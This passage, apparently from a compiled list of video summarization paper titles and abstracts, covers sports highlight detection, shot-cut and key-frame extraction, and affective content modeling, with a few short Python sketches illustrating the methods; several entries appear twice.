The expected variations in a user's excitement are represented by the excitement time curve, which is, subsequently, filtered in an adaptive way to extract the highlights in the prespecified total length and in view of the preferences regarding the highlights strength: extraction can namely be performed with variable sensitivity to capture few "strong" highlights or more "less strong" ones. We evaluate and discuss the performance of our method on the case study of soccer TV broadcasts. --- paper_title: Semantic units detection and summarization of baseball videos paper_content: A framework for analyzing baseball videos and generation of game summary is proposed. Due to the well-defined rules of baseball games, the system efficiently detects semantic units by the domain-related knowledge, and therefore, automatically discovers the structure of a baseball game. After extracting the information changes that are caused by some semantic events on the superimposed caption, a rule-based decision tree is applied to detect meaningful events. Only three types of information, including number-of-outs, score, and base occupation status, are taken in the detection process, and thus the framework detects events and produces summarization in an efficient and effective manner. The experimental results show the effectiveness of this framework and some research opportunities about generating semantic-level summary for sports videos. --- paper_title: Information theory-based shot cut/fade detection and video summarization paper_content: New methods for detecting shot boundaries in video sequences and for extracting key frames using metrics based on information theory are proposed. The method for shot boundary detection relies on the mutual information (MI) and the joint entropy (JE) between the frames. It can detect cuts, fade-ins and fade-outs. The detection technique was tested on the TRECVID2003 video test set having different types of shots and containing significant object and camera motion inside the shots. It is demonstrated that the method detects both fades and abrupt cuts with high accuracy. The information theory measure provides us with better results because it exploits the inter-frame information in a more compact way than frame subtraction. It was also successfully compared to other methods published in the literature. The method for key frame extraction uses MI as well. We show that it captures satisfactorily the visual content of the shot. --- paper_title: Creating audio keywords for event detection in soccer video paper_content: This paper presents a novel framework called audio keywords to assist event detection in soccer video. Audio keyword is a middle-level representation that can bridge the gap between low-level features and high-level semantics. Audio keywords are created from low-level audio features by using support vector machine learning. The created audio keywords can be used to detect semantic events in soccer video by applying a heuristic mapping. Experiments of audio keywords creation and event detection based on audio keywords have illustrated promising results. According to the experimental results, we believe that audio keyword is an effective representation that is able to achieve more intuitive results for event detection in sports video compared with the method of event detection directly based on low-level features.
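As an illustration of the mutual-information cut detection described in the information-theoretic entry above, the following Python sketch flags a cut wherever the mutual information between consecutive grayscale frames drops well below its recent running average. This is a minimal reading of the idea, not the cited implementation: frames are assumed to be 8-bit grayscale numpy arrays, the bin count, drop ratio and window length are illustrative values, and the joint-entropy test that the cited work uses for fades is omitted.

import numpy as np

def mutual_information(frame_a, frame_b, bins=64):
    """Mutual information between the gray-level distributions of two frames."""
    hist_2d, _, _ = np.histogram2d(frame_a.ravel(), frame_b.ravel(),
                                   bins=bins, range=[[0, 256], [0, 256]])
    pxy = hist_2d / hist_2d.sum()
    px = pxy.sum(axis=1, keepdims=True)
    py = pxy.sum(axis=0, keepdims=True)
    nz = pxy > 0
    return float(np.sum(pxy[nz] * np.log2(pxy[nz] / (px @ py)[nz])))

def detect_cuts(frames, drop_ratio=0.3, window=10):
    """Flag a cut where the inter-frame MI falls far below its recent average."""
    mi = [mutual_information(frames[i], frames[i + 1]) for i in range(len(frames) - 1)]
    cuts = []
    for i, value in enumerate(mi):
        start = max(0, i - window)
        if i > start and value < drop_ratio * float(np.mean(mi[start:i])):
            cuts.append(i + 1)  # cut lies between frame i and frame i+1
    return cuts

A fade detector would additionally track how the joint entropy evolves over a run of frames, as the cited entry does.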
--- paper_title: Automatically generating summaries for musical video paper_content: In this paper, we propose a novel approach to automatically summarize musical videos. The proposed summarization scheme is different from the current methods used for video summarization. The musical video is separated into the musical and visual tracks. A music summary is created by analyzing the music content based on music features, adaptive clustering algorithm and musical domain knowledge. Then, shots are detected and clustered in the visual track. Finally, the music video summary is created by aligning the music summary and clustered video shots. Subjective studies by experienced users have been conducted to evaluate the quality of summarization. The experiments on different genres of musical video and comparisons with the summaries only based on music track and video track indicate that the results of summarization using the proposed method are significant and effective in helping realize users' expectations. --- paper_title: Event detection in baseball video using superimposed caption recognition paper_content: We have developed a novel system for baseball video event detection and summarization using superimposed caption text detection and recognition. The system detects different types of semantic level events in baseball video including scoring and last pitch of each batter. The system has two components: event detection and event boundary detection. Event detection is realized by change detection and recognition of game stat texts (such as the text information shown in the score box). Event boundary detection is achieved using our previously developed algorithm, which detects the pitch view as the event beginning and nonactive view as potential endings of the event. One unique contribution of the system is its capability to accurately detect the semantic level events by combining video text recognition with camera view recognition. Another unique feature is the real-time processing speed by taking advantage of compressed-domain approaches in part of the algorithms such as caption detection. To the best of our knowledge, this is the first system achieving accurate detection of multiple types of high-level semantic events in baseball videos. --- paper_title: An approach to generating two-level video abstraction paper_content: Video abstraction is a short summary of the content of a longer video document. Most existing video abstraction methods are based on the shot level, which is not sufficient for meaningful browsing and is sometimes too fine-grained for users. In this paper, we propose a novel approach of generating video abstraction at two levels, namely, the shot-level and the scene-level. We propose a method of extracting key frames from shots according to their content variation. An updated time-adaptive algorithm is used to group the shots into scenes, and representative frames are extracted in the region of each scene using a Minimum Spanning Tree. Key frames and representative frames can represent the content of shots and scenes, respectively. The organized sequences of key frames and representative frames are the two-level video abstraction. Experiments based on real-world movies show that the method above can provide users with better video summary at different levels.
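The two-level abstraction entry above groups shots into scenes with a time-adaptive algorithm before representative frames are extracted. The sketch below is a simplified, hypothetical version of such temporal grouping, assuming every shot has already been reduced to a normalized color histogram; the L1 distance, threshold and lookback window are illustrative choices rather than the cited algorithm's settings.

import numpy as np

def group_shots_into_scenes(shot_features, threshold=0.35, lookback=3):
    """Greedy, time-constrained grouping of consecutive shots into scenes.

    shot_features: list of 1-D numpy arrays (normalized histograms), one per
    shot, in temporal order. A shot starts a new scene when it is dissimilar
    to the last `lookback` shots of the current scene.
    """
    if not shot_features:
        return []

    def distance(a, b):
        return 0.5 * float(np.abs(a - b).sum())  # L1 distance between normalized histograms

    scenes = [[0]]
    for idx in range(1, len(shot_features)):
        recent = scenes[-1][-lookback:]
        d = min(distance(shot_features[idx], shot_features[j]) for j in recent)
        if d <= threshold:
            scenes[-1].append(idx)   # similar enough: extend the current scene
        else:
            scenes.append([idx])     # dissimilar: open a new scene
    return scenes

Each returned scene is a list of shot indices; a key frame per shot and a representative frame per scene would then form the two abstraction levels.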
--- paper_title: Summarization of news video and its description for content‐based access paper_content: A video summary abstracts the entirety with the gist without losing the essential content of the original video and also facilitates efficient content-based access to the desired content. In this article, we propose a novel method for summarizing a news video based on multimodal analysis of the content. The proposed method exploits the closed caption (CC) data to locate semantically meaningful highlights in a news video and speech signals in an audio stream to align the CC data with the video in a time-line. Then, the extracted highlights are described in a multilevel structure using the MPEG-7 Summarization Description Scheme (DS). Specifically, we use the HierarchicalSummary DS that allows efficient accessing of the content through such functionalities as multilevel abstracts and navigation guidance in a hierarchical fashion. Intensive experiments with our prototypical systems are presented to demonstrate the validity and reliability of the proposed method in real applications. © 2004 Wiley Periodicals, Inc. Int J Imaging Syst Technol 13, 267–274, 2003; Published online in Wiley InterScience (www.interscience.wiley.com). DOI 10.1002/ima.10067 --- paper_title: Narrative abstraction model for story-oriented video paper_content: TV program review services, especially drama review services, are one of the most popular video on demand services on the Web. In this paper, we propose a novel video abstraction model for a review service of story-oriented video such as dramas. In a drama review service, viewers want to understand the story in a short time and service providers want to provide video abstracts at minimum cost. The proposed model enables the automatic creation of a video abstract that still allows viewers to understand the overall story of the source video. Also, the model has a flexible structure so that the duration of an abstract can be adjusted depending on the requirements given by viewers. We get clues for human understanding of a story from scenario writing rules and editorial techniques which are popularly used in the process of video producing. We have implemented the proposed model and successfully applied it to several TV dramas. --- paper_title: Automatically extracting highlights for TV Baseball programs paper_content: In today's fast-paced world, while the number of channels of television programming available is increasing rapidly, the time available to watch them remains the same or is decreasing. Users desire the capability to watch the programs time-shifted (on-demand) and/or to watch just the highlights to save time. In this paper we explore how to provide for the latter capability, that is the ability to extract highlights automatically, so that viewing time can be reduced. We focus on the sport of baseball as our initial target—it is a very popular sport, the whole game is quite long, and the exciting portions are few. We focus on detecting highlights using audio-track features alone without relying on expensive-to-compute video-track features. We use a combination of generic sports features and baseball-specific features to obtain our results, but believe that many other sports offer the same opportunity and that the techniques presented here will apply to those sports. We present details on relative performance of various learning algorithms, and a probabilistic framework for combining multiple sources of information.
We present results comparing output of our algorithms against human-selected highlights for a diverse collection of baseball games with very encouraging results. --- paper_title: Sequential association mining for video summarization paper_content: In this paper, we propose an association-based video summarization scheme that mines sequential associations from video data for summary creation. Given detected shots of video V, we first cluster them into visually distinct groups, and then construct a sequential sequence by integrating the temporal order and cluster type of each shot. An association mining scheme is designed to mine sequentially associated clusters from the sequence, and these clusters are selected as summary candidates. With a user specified summary length, our system generates the corresponding summary by selecting representative frames from candidate clusters and assembling them by their original temporal order. The experimental evaluation demonstrates the effectiveness of our summarization method. --- paper_title: Automatic generation of video summaries for historical films paper_content: A video summary is a sequence of video clips extracted from a longer video. Much shorter than the original, the summary preserves its essential messages. In the ECHO (European Chronicles On-line) project, a system was developed to store and manage large collections of historical films for the preservation of cultural heritage. At the University of Mannheim, we have developed the video summarization component of the ECHO system. We discuss the particular challenges the historical film material poses, and how we have designed new video processing algorithms and modified existing ones to cope with noisy black-and-white films. --- paper_title: VSUM: summarizing from videos paper_content: Summarization of produced video data (like news or movies) aims to find important segments that contain rich information. Users could obtain the important messages by reading summaries rather than full documents. The research in this area could be divided into two parts: (1) the image processing (IP) perspective, and (2) the NLP (natural language processing) perspective. The former puts emphasis on the detection of key frames, while the latter focuses on the extraction of important concepts. This paper proposes a video summarization system, VSUM. VSUM first identifies all caption words, and then adopts a technique to find the important segments. An external thesaurus is also used in VSUM to enhance the summary extraction process. The experimental results show that VSUM could perform well even if the accuracy of OCR (optical character recognition) is not high. --- paper_title: Video summarization and scene detection by graph modeling paper_content: We propose a unified approach for video summarization based on the analysis of video structures and video highlights. Two major components in our approach are scene modeling and highlight detection. Scene modeling is achieved by normalized cut algorithm and temporal graph analysis, while highlight detection is accomplished by motion attention modeling. In our proposed approach, a video is represented as a complete undirected graph and the normalized cut algorithm is carried out to globally and optimally partition the graph into video clusters. The resulting clusters form a directed temporal graph and a shortest path algorithm is proposed to efficiently detect video scenes.
The attention values are then computed and attached to the scenes, clusters, shots, and subshots in a temporal graph. As a result, the temporal graph can inherently describe the evolution and perceptual importance of a video. In our application, video summaries that emphasize both content balance and perceptual quality can be generated directly from a temporal graph that embeds both the structure and attention information. --- paper_title: Low cost soccer video summaries based on visual rhythm paper_content: The visual rhythm is a spatio-temporal sampled representation of video data providing compact information while preserving several types of video events. We exploit these properties in the present work to propose two new low level descriptors for the analysis of soccer videos computed directly from the visual rhythm. The descriptors are related to dominant color and camera motion estimation. The new descriptors are applied in different tasks aiming the analysis of soccer videos such as shot transition detection, shot classification and attack direction estimation. We also present a simple automated soccer summary application to illustrate the use of the new descriptors. --- paper_title: MSN: statistical understanding of broadcasted baseball video using multi-level semantic network paper_content: The information processing of sports video yields valuable semantics for content delivery over narrowband networks. Traditional image/video processing is formulated in terms of low-level features describing image/video structure and intensity, while the high-level knowledge such as common sense and human perceptual knowledge are encoded in abstract and nongeometric representations. The management of semantic information in video becomes more and more difficult because of the large difference in representations, levels of knowledge, and abstract episodes. This paper proposes a semantic highlight detection scheme using a Multi-level Semantic Network (MSN) for baseball video interpretation. The probabilistic structure can be applied for highlight detection and shot classification. Satisfactory results will be shown to illustrate better performance compared with the traditional ones. --- paper_title: MINMAX optimal video summarization paper_content: The need for video summarization originates primarily from a viewing time constraint. A shorter version of the original video sequence is desirable in a number of applications. Clearly, a shorter version is also necessary in applications where storage, communication bandwidth and/or power are limited. In this paper, our work is based on a MINMAX optimization formulation with viewing time, frame skip and bit rate constraints. New metrics for missing frame and video summary distortions are introduced. Optimal algorithm based on dynamic programming is presented along with experimental results. --- paper_title: Video skimming and characterization through the combination of image and language understanding paper_content: Digital video is rapidly becoming important for education, entertainment and a host of multimedia applications. With the size of the video collections growing to thousands of hours, technology is needed to effectively browse segments in a short time without losing the content of the video. We propose a method to extract the significant audio and video information and create a skim video which represents a very short synopsis of the original.
The goal of this work is to show the utility of integrating language and image understanding techniques for video skimming by extraction of significant information, such as specific objects, audio keywords and relevant video structure. The resulting skim video is much shorter, with compaction as high as 20:1, and yet it retains the essential content of the original segment. We have conducted a user-study to test the content summarization and effectiveness of the skim as a browsing tool. --- paper_title: An innovative algorithm for key frame extraction in video summarization paper_content: Video summarization, aimed at reducing the amount of data that must be examined in order to retrieve the information desired from information in a video, is an essential task in video analysis and indexing applications. We propose an innovative approach for the selection of representative (key) frames of a video sequence for video summarization. By analyzing the differences between two consecutive frames of a video sequence, the algorithm determines the complexity of the sequence in terms of changes in the visual content expressed by different frame descriptors. The algorithm, which escapes the complexity of existing methods based, for example, on clustering or optimization strategies, dynamically and rapidly selects a variable number of key frames within each sequence. The key frames are extracted by detecting curvature points within the curve of the cumulative frame differences. Another advantage is that it can extract the key frames on the fly: curvature points can be determined while computing the frame differences and the key frames can be extracted as soon as a second high curvature point has been detected. We compare the performance of this algorithm with that of other key frame extraction algorithms based on different approaches. The summaries obtained have been objectively evaluated by three quality measures: the Fidelity measure, the Shot Reconstruction Degree measure and the Compression Ratio measure. --- paper_title: Highlight sound effects detection in audio stream paper_content: This paper addresses the problem of highlight sound effects detection in audio stream, which is very useful in the fields of video summarization and highlight extraction. Unlike research on audio segmentation and classification, this task only locates highlight sound effects in the audio stream. An extensible framework is proposed, and in the current system three sound effects are considered: laughter, applause and cheer, which are tied up with highlight events in entertainment, sports, meetings and home videos. HMMs are used to model these sound effects, and a method based on log-likelihood scores is used to make the final decision. A sound effect attention model is also proposed to extend the general audio attention model for highlight extraction and video summarization. Evaluations on a 2-hour audio database showed very encouraging results. --- paper_title: Classification of self-consumable highlights for soccer video summaries paper_content: An effective scheme for soccer summarization is significant to improve the usage of this massively growing video data. The paper presents an extension to our recent work which proposed a framework to integrate highlights into play-breaks to construct more complete soccer summaries. The current focus is to demonstrate the benefits of detecting some specific audio-visual features during play-break sequences in order to classify highlights contained within them.
The main purpose is to generate summaries which are self-consumable individually. To support this framework, the algorithms for shot classification and detection of near-goal and slow-motion replay scenes are described. The results of our experiment using 5 soccer videos (20 minutes each) show the performance and reliability of our framework. --- paper_title: Augmented segmentation and visualization for presentation videos paper_content: We investigate methods of segmenting, visualizing, and indexing presentation videos by both audio and visual data. The audio track is segmented by speaker, and augmented with key phrases which are extracted using an Automatic Speech Recognizer (ASR). The video track is segmented by visual dissimilarities and changes in speaker gesturing, and augmented by representative key frames. An interactive user interface combines a visual representation of audio, video, text, key frames, and allows the user to navigate presentation videos. User studies with 176 students of varying knowledge were conducted on 7.5 hours of student presentation video (32 presentations). Tasks included searching for various portions of presentations, both known and unknown to students, and summarizing presentations given the annotations. The results are favorable towards the video summaries and the interface, suggesting faster responses by a factor of 20% compared to having access to the actual video. Accuracy of responses remained the same on average. Follow-up surveys present a number of suggestions towards improving the interface, such as the incorporation of automatic speaker clustering and identification, and the display of an abstract topological view of the presentation. Surveys also show alternative contexts in which students would like to use the tool in the classroom environment. --- paper_title: A fast layout algorithm for visual video summaries paper_content: We created an improved layout algorithm for automatically generating visual video summaries reminiscent of comic book pages. The summaries are comprised of images from the video that are sized according to their importance. The algorithm performs a global optimization with respect to a layout cost function that encompasses features such as the number of resized images and the amount of whitespace in the presentation. The algorithm creates summaries that: always fit exactly into the requested area, are varied by containing few rows with images of the same size, and have little whitespace at the end of the last row. The layout algorithm is fast enough to allow the interactive resizing of the summaries and the subsequent generation of a new layout. --- paper_title: Spatio-temporal quality assessment for home videos paper_content: Compared with the video programs taken by professionals, home videos often have low-quality content resulting from a lack of professional capture skills. In this paper, we present a novel spatio-temporal quality assessment scheme in terms of low-level content features for home videos. In contrast to existing frame-level-based quality assessment approaches, a type of temporal segment of video, sub-shot, is selected as the basic unit for quality assessment. A set of spatio-temporal artifacts, regarded as the key factors affecting the overall perceived quality (i.e. unstableness, jerkiness, infidelity, blurring, brightness and orientation), are mined from each sub-shot based on the particular characteristics of home videos.
The relationship between the overall quality metric and these factors is exploited by three different methods, including user study, factor fusion, and a learning-based scheme. To validate the proposed scheme, we present a scalable quality-based home video summarization system, aiming at achieving the best quality while simultaneously preserving the most informative content. A comparison user study between this system and the attention model based video skimming approach demonstrated the effectiveness of the proposed quality assessment scheme. --- paper_title: Video summarization by spatial-temporal graph optimization paper_content: In this paper we present a novel approach for video summarization based on graph optimization. Our approach emphasizes both a comprehensive visual-temporal content coverage and visual coherence of the video summary. The approach has three stages. First, the source video is segmented into video shots, and a candidate shot set is selected from the video shots according to some video features. Second, a dissimilarity function is defined between the video shots to describe their spatial-temporal relation, and the candidate video shot set is modelled into a directional graph. Third, we outline a dynamic programming algorithm and use it to search the longest path in the graph as the final video skimming. A static video summary is generated at the same time. Experimental results show encouraging promises of our approach for video summarization. --- paper_title: Affective video content representation and modeling paper_content: This paper looks into a new direction in video content analysis - the representation and modeling of affective video content. The affective content of a given video clip can be defined as the intensity and type of feeling or emotion (both are referred to as affect) that are expected to arise in the user while watching that clip. The availability of methodologies for automatically extracting this type of video content will extend the current scope of possibilities for video indexing and retrieval. For instance, we will be able to search for the funniest or the most thrilling parts of a movie, or the most exciting events of a sport program. Furthermore, as the user may want to select a movie not only based on its genre, cast, director and story content, but also on its prevailing mood, the affective content analysis is also likely to contribute to enhancing the quality of personalizing the video delivery to the user. We propose in this paper a computational framework for affective video content representation and modeling. This framework is based on the dimensional approach to affect that is known from the field of psychophysiology. According to this approach, the affective video content can be represented as a set of points in the two-dimensional (2-D) emotion space that is characterized by the dimensions of arousal (intensity of affect) and valence (type of affect). We map the affective video content onto the 2-D emotion space by using the models that link the arousal and valence dimensions to low-level features extracted from video data. This results in the arousal and valence time curves that, either considered separately or combined into the so-called affect curve, are introduced as reliable representations of expected transitions from one feeling to another along a video, as perceived by a viewer.
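The affective-content entry above maps low-level features to arousal and valence time curves from which exciting segments can be read off. The sketch below illustrates only the general shape of that idea under stated assumptions: per-frame motion activity, shot-cut density and audio energy are taken as already normalized to [0, 1], combined with equal weights, smoothed with a moving average, and thresholded at a percentile. The cited model constructs and filters its curves differently; this is an illustrative reduction, not the authors' formulation.

import numpy as np

def arousal_curve(motion, cut_density, audio_energy, smooth_len=25):
    """Illustrative arousal curve: a smoothed, equally weighted sum of per-frame
    motion activity, shot-cut density and audio energy (all assumed in [0, 1])."""
    raw = (np.asarray(motion) + np.asarray(cut_density) + np.asarray(audio_energy)) / 3.0
    kernel = np.ones(smooth_len) / smooth_len       # simple moving-average smoothing
    return np.convolve(raw, kernel, mode="same")

def select_highlights(arousal, percentile=85):
    """Return (start, end) frame ranges where the arousal curve stays above a percentile."""
    thr = np.percentile(arousal, percentile)
    above = arousal >= thr
    segments, start = [], None
    for i, flag in enumerate(above):
        if flag and start is None:
            start = i
        elif not flag and start is not None:
            segments.append((start, i))
            start = None
    if start is not None:
        segments.append((start, len(above)))
    return segments

The returned ranges could then be trimmed or ranked to meet a requested total skim length.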
--- paper_title: Video caption detection and extraction using temporal information paper_content: Video caption detection and extraction is an important step for information retrieval in video databases. In this paper, we extract text information in video by fully utilizing the temporal information contained in the video. First we create a binary abstract sequence from a video segment. By analyzing the statistical pixel changes in the sequence, we can effectively locate the (dis)appearing frames of captions. Finally we extract the captions to create a summary of the video segment. --- paper_title: Automatic Soccer Video Analysis and Summarization paper_content: We propose a fully automatic and computationally efficient framework for analysis and summarization of soccer videos using cinematic and object-based features. The proposed framework includes some novel low-level processing algorithms, such as dominant color region detection, robust shot boundary detection, and shot classification, as well as some higher-level algorithms for goal detection, referee detection, and penalty-box detection. The system can output three types of summaries: i) all slow-motion segments in a game; ii) all goals in a game; iii) slow-motion segments classified according to object-based features. The first two types of summaries are based on cinematic features only for speedy processing, while the summaries of the last type contain higher-level semantics. The proposed framework is efficient, effective, and robust. It is efficient in the sense that there is no need to compute object-based features when cinematic features are sufficient for the detection of certain events, e.g., goals in soccer. It is effective in the sense that the framework can also employ object-based features when needed to increase accuracy (at the expense of more computation). The efficiency, effectiveness, and robustness of the proposed framework are demonstrated over a large data set, consisting of more than 13 hours of soccer video, captured in different countries and under different conditions. --- paper_title: Dynamic storyboards for video content summarization paper_content: We propose an innovative, general purpose, approach to the selection and hierarchical representation of key frames of a video sequence for video summarization. In the first stage the shot detection module performs the video structural analysis; in the second stage the key frame extraction module creates the visual summary; and in the last stage the summary post-processing module, after a pre-classification aimed at removing meaningless key frames, creates a multilevel storyboard that the user may browse. --- paper_title: Two-Stage Hierarchical Video Summary Extraction to Match Low-Level User Browsing Preferences paper_content: A compact summary of video that conveys visual content at various levels of detail enhances user interaction significantly. In this paper, we propose a two-stage framework to generate MPEG-7-compliant hierarchical key frame summaries of video sequences. At the first stage, which is carried out off-line at the time of content production, fuzzy clustering and data pruning methods are applied to given video segments to obtain a nonredundant set of key frames that comprise the finest level of the hierarchical summary. The number of key frames allocated to each shot or segment is determined dynamically and without user supervision through the use of cluster validation techniques.
A coarser summary is generated on-demand in the second stage by reducing the number of key frames to match the low-level browsing preferences of a user. The proposed method has been validated by experimental results on a collection of video programs. --- paper_title: A highlight scene detection and video summarization system using audio feature for a personal video recorder paper_content: The personal video recorder such as the recordable-DVD recorder, Blu-ray disc recorder and/or hard disc recorder has become popular as a large-volume storage device for video/audio content data, and a browsing function that would quickly provide a desired scene to the user is required as an essential part of such a large capacity recording/playback system. We propose a highlight scene detection function by using only 'audio' features and realize a browsing function for the recorder that enables completely automatic detection of sports highlights. We detect sports highlights by identifying portions with "commentator's excited speech" using Gaussian mixture models (GMM's) trained using the MDL criterion. Our computation is carried out directly on the MDCT coefficients from the AC-3 coefficients thus giving us a tremendous speed advantage. Our accuracy of detection of sports highlights is high across a variety of sports. --- paper_title: Flashlight and player detection in fighting sport for video summarization paper_content: In this paper, we present a method for generating summary highlights of fighting sport videos using flashlight [N. Benjamas et al., May 2005] and player detection, by detecting frames that contain close-up flashlights and players. The detected flashlights and the distance between players are utilized in efficient summarization of fighting sport videos. The proposed algorithm first detects players using skin color detection and connected component labeling. Then, it identifies the relevant frames by calculating the distance between one player and another. Because our algorithm accurately detects the distance between players, it has the ability to capture inherently important events. --- paper_title: A utility framework for the automatic generation of audio-visual skims paper_content: In this paper, we present a novel algorithm for generating audio-visual skims from computable scenes. Skims are useful for browsing digital libraries, and for on-demand summaries in set-top boxes. A computable scene is a chunk of data that exhibits consistencies with respect to chromaticity, lighting and sound. There are three key aspects to our approach: (a) visual complexity and grammar, (b) robust audio segmentation and (c) a utility model for skim generation. We define a measure of visual complexity of a shot, and map complexity to the minimum time for comprehending the shot. Then, we analyze the underlying visual grammar, since it makes the shot sequence meaningful. We segment the audio data into four classes, and then detect significant phrases in the speech segments. The utility functions are defined in terms of complexity and duration of the segment. The target skim is created using a general constrained utility maximization procedure that maximizes the information content and the coherence of the resulting skim. The objective function is constrained due to multimedia synchronization constraints, visual syntax and by penalty functions on audio and video segments.
The user study results indicate that the optimal skims show statistically significant differences with other skims with compression rates up to 90%. --- paper_title: Adaptive extraction of highlights from a sport video based on excitement modeling paper_content: This paper addresses the challenge of automatically extracting the highlights from sports TV broadcasts. In particular, we are interested in finding a generic method of highlights extraction, which does not require the development of models for the events that are thought to be interpreted by the users as highlights. Instead, we search for highlights in those video segments that are expected to excite the users most. It is namely realistic to assume that a highlighting event induces a steady increase in a user's excitement, as compared to other, less interesting events. We mimic the expected variations in a user's excitement by observing the temporal behavior of selected audiovisual low-level features and the editing scheme of a video. Relations between this noncontent information and the evoked excitement are drawn partly from psychophysiological research and partly from analyzing the live-video directing practice. The expected variations in a user's excitement are represented by the excitement time curve, which is, subsequently, filtered in an adaptive way to extract the highlights in the prespecified total length and in view of the preferences regarding the highlights strength: extraction can namely be performed with variable sensitivity to capture few "strong" highlights or more "less strong" ones. We evaluate and discuss the performance of our method on the case study of soccer TV broadcasts. --- paper_title: Semantic units detection and summarization of baseball videos paper_content: A framework for analyzing baseball videos and generation of game summary is proposed. Due to the well-defined rules of baseball games, the system efficiently detects semantic units by the domain-related knowledge, and therefore, automatically discovers the structure of a baseball game. After extracting the information changes that are caused by some semantic events on the superimposed caption, a rule-based decision tree is applied to detect meaningful events. Only three types of information, including number-of-outs, score, and base occupation status, are taken in the detection process, and thus the framework detects events and produces summarization in an efficient and effective manner. The experimental results show the effectiveness of this framework and some research opportunities about generating semantic-level summary for sports videos. --- paper_title: Information theory-based shot cut/fade detection and video summarization paper_content: New methods for detecting shot boundaries in video sequences and for extracting key frames using metrics based on information theory are proposed. The method for shot boundary detection relies on the mutual information (MI) and the joint entropy (JE) between the frames. It can detect cuts, fade-ins and fade-outs. The detection technique was tested on the TRECVID2003 video test set having different types of shots and containing significant object and camera motion inside the shots. It is demonstrated that the method detects both fades and abrupt cuts with high accuracy. The information theory measure provides us with better results because it exploits the inter-frame information in a more compact way than frame subtraction. It was also successfully compared to other methods published in literature. 
The method for key frame extraction uses MI as well. We show that it captures satisfactorily the visual content of the shot. --- paper_title: Automatically generating summaries for musical video paper_content: In this paper, we propose a novel approach to automatically summarize musical videos. The proposed summarization scheme is different from the current methods used for video summarization. The musical video is separated into the musical and visual tracks. A music summary is created by analyzing the music content based on music features, adaptive clustering algorithm and musical domain knowledge. Then, shots are detected and clustered in the visual track. Finally, the music video summary is created by aligning the music summary and clustered video shots. Subjective studies by experienced users have been conducted to evaluate the quality of summarization. The experiments on different genres of musical video and comparisons with the summaries only based on music track and video track indicate that the results of summarization using proposed method are significant and effective to help realize user's expectation. --- paper_title: An approach to generating two-level video abstraction paper_content: Video abstraction is a short summary of the content of a longer video document. Most existing video abstraction methods are based on shot-level, which is not sufficient to meaningful browsing and is too fine to users sometimes. In this paper, we propose a novel approach of generating video abstraction at two levels, namely, the shot-level and the scene-level. We put up a method of extracting key frames from shots, according to the content variation of the latter. An updated time-adaptive algorithm is used to group the shots into scene and representative frames are extracted in the region of that scene using the method of generating Minimum Spanning Tree. Key frames and representative frames can represent the content of shots and scenes, respectively. The organized sequences of key frames and representative frames are the two-level video abstraction. Experiments based on real-world movies show that the method above can provide users with better video summary at different levels. --- paper_title: Summarization of news video and its description for content‐based access paper_content: A video summary abstracts the entirety with the gist without losing the essential content of the original video and also facilitates efficient content-based access to the desired content. In this article, we propose a novel method for summarizing a news video based on multimodal analysis of the content. The proposed method exploits the closed caption (CC) data to locate semantically meaningful highlights in a news video and speech signals in an audio stream to align the CC data with the video in a time-line. Then, the extracted highlights are described in a multilevel structure using the MPEG-7 Summarization Description Scheme (DS). Specifically, we use the HierarchicalSummary DS that allows efficient accessing of the content through such functionalities as multilevel abstracts and navigation guidance in a hierarchical fashion. Intensive experiments with our prototypical systems are presented to demonstrate the validity and reliability of the proposed method in real applications. © 2004 Wiley Periodicals, Inc. Int J Imaging Syst Technol 13, 267–274, 2003; Published online in Wiley InterScience (www.interscience.wiley.com). 
DOI 10.1002/ima.10067 --- paper_title: Narrative abstraction model for story-oriented video paper_content: TV program review services, especially drama review services, are one of the most popular video on demand services on the Web. In this paper, we propose a novel video abstraction model for a review service of story-oriented video such as dramas. In a drama review service, viewers want to understand the story in a short time and service providers want to provide video abstracts at minimum cost. The proposed model enables the automatic creation of a video abstract that still allows viewers to understand the overall story of the source video. Also, the model has a flexible structure so that the duration of an abstract can be adjusted depending on the requirements given by viewers. We get clues for human understanding of a story from scenario writing rules and editorial techniques which are popularly used in the process of video producing. We have implemented the proposed model and successfully applied it to several TV dramas. --- paper_title: Automatically extracting highlights for TV Baseball programs paper_content: In today's fast-paced world, while the number of channels of television programming available is increasing rapidly, the time available to watch them remains the same or is decreasing. Users desire the capability to watch the programs time-shifted (on-demand) and/or to watch just the highlights to save time. In this paper we explore how to provide for the latter capability, that is the ability to extract highlights automatically, so that viewing time can be reduced. We focus on the sport of baseball as our initial target—it is a very popular sport, the whole game is quite long, and the exciting portions are few. We focus on detecting highlights using audio-track features alone without relying on expensive-to-compute video-track features. We use a combination of generic sports features and baseball-specific features to obtain our results, but believe that may other sports offer the same opportunity and that the techniques presented here will apply to those sports. We present details on relative performance of various learning algorithms, and a probabilistic framework for combining multiple sources of information. We present results comparing output of our algorithms against human-selected highlights for a diverse collection of baseball games with very encouraging results. --- paper_title: Sequential association mining for video summarization paper_content: In this paper, we propose an association-based video summarization scheme that mines sequential associations from video data for summary creation. Given detected shots of video V, we first cluster them into visually distinct groups, and then construct a sequential sequence by integrating the temporal order and cluster type of each shot. An association mining scheme is designed to mine sequentially associated clusters from the sequence, and these clusters are selected as summary candidates. With a user specified summary length, our system generates the corresponding summary by selecting representative frames from candidate clusters and assembling them by their original temporal order. The experimental evaluation demonstrates the effectiveness of our summarization method. --- paper_title: Automatic generation of video summaries for historical films paper_content: A video summary is a sequence of video clips extracted from a longer video. Much shorter than the original, the summary preserves its essential messages. 
In the ECHO (European Chronicles On-line) project, a system was developed to store and manage large collections of historical films for the preservation of cultural heritage. At the University of Mannheim, we have developed the video summarization component of the ECHO system. We discuss the particular challenges the historical film material poses, and how we have designed new video processing algorithms and modified existing ones to cope with noisy black-and-white films. --- paper_title: VSUM: summarizing from videos paper_content: Summarization of produced video data (like news or movies) aims to find important segments that contain rich information. Users could obtain the important messages by reading summaries rather than full documents. The research in this area could be divided into two parts: (1) the image processing (IP) perspective, and (2) the NLP (natural language processing) perspective. The former puts emphasis on the detection of key frames, while the latter focuses on the extraction of important concepts. This paper proposes a video summarization system, VSUM. VSUM first identifies all caption words, and then adopts a technique to find the important segments. An external thesaurus is also used in VSUM to enhance the summary extraction process. The experimental results show that VSUM could perform well even if the accuracy of OCR (optical character recognition) is not high. --- paper_title: Video summarization and scene detection by graph modeling paper_content: We propose a unified approach for video summarization based on the analysis of video structures and video highlights. Two major components in our approach are scene modeling and highlight detection. Scene modeling is achieved by normalized cut algorithm and temporal graph analysis, while highlight detection is accomplished by motion attention modeling. In our proposed approach, a video is represented as a complete undirected graph and the normalized cut algorithm is carried out to globally and optimally partition the graph into video clusters. The resulting clusters form a directed temporal graph and a shortest path algorithm is proposed to 